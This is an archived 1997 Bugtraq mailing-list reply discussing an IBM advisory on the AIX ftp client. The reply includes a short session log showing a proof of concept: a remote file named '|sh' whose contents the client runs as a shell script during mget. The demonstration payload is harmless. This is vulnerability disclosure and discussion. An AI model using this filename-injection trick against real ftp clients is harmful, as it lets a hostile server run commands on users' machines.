Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1997_4

Bugtraq archives for 4th quarter (Oct-Dec) 1997: Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client

Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client

afC4C.COM
Mon, 3 Nov 1997 10:03:52 -0700

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Artur Grabowski: "Re: Major security-hole in kerberos rsh, rcp and rlogin."
Previous message: We got Food - Fuel - Ice-cold Beer - and X.509 certificates: "Re: [seg-l] Passwords en Cisco (fwd)"
In reply to: Miguel Angel Rodriguez Jodar: "Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client"
Next in thread: Lutz Donnerhacke: "Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client"

> ersVNET.IBM.COM wrote:
> > VULNERABILITY:    The AIX ftp client interprets server provided
> > filenames
> > I.  Description
> > The ftp client can be tricked into running arbitrary commands supplied
> > by the
> > remote server.  When the remote file begins with a pipe symbol, the
> > ftp client
> > will process the contents of the remote file as a shell script.
>
> On two machines running AIX 3.2.5 I've tested it, but instead of
> executing the remote file, it searches for a local file with the same
> name as the remote file and executes it with normal user priviledges
> instead of root privilegdes.

Yes, but try "|sh" instead.  I've included a log of what happens.
> BTW, I believe that this also happens on HP-UX 9.05

It works on our Linux slackware as well.  I suspect most ftp
clients are susceptible to this "problem."

$ id
uid=100(guest) gid=100(usr)
$ pwd
/tmp/ftp-test
$ echo "id > /tmp/OUT" > "|sh"
$ ls -la
total 24
drwxr-xr-x   2 guest    usr          512 Nov  3 09:45 .
drwxrwxrwt   6 bin      bin         1024 Nov  3 09:44 ..
-rw-r--r--   1 guest    usr           14 Nov  3 09:45 |sh
$ ftp localhost
Connected to localhost.
....snip....
230 User guest logged in.
ftp> cd /tmp/ftp-test
ftp> ls -l
total 24
-rw-r--r--   1 guest    usr           14 Nov  3 09:45 |sh
ftp> mget *
mget |sh? y
150 Opening data connection for |sh (14 bytes).
15 bytes received in 0.2187 seconds (0.06699 Kbytes/s)
local: |sh remote: |sh
ftp> quit
$ ls -l /tmp/OUT
-rw-r--r--   1 guest    usr           28 Nov  3 09:45 /tmp/OUT
$ cat /tmp/OUT
uid=100(guest) gid=100(usr)
$

I also wonder about IBM's answer:

SOLUTION:         Remove the setuid bit from the "ftp" command.

On our 4.2.1, ftp will not run if it is not suid.
Didn't somebody test this?

Andrew Green
afc4c.com

Next message: Artur Grabowski: "Re: Major security-hole in kerberos rsh, rcp and rlogin."
Previous message: We got Food - Fuel - Ice-cold Beer - and X.509 certificates: "Re: [seg-l] Passwords en Cisco (fwd)"
In reply to: Miguel Angel Rodriguez Jodar: "Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client"
Next in thread: Lutz Donnerhacke: "Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client"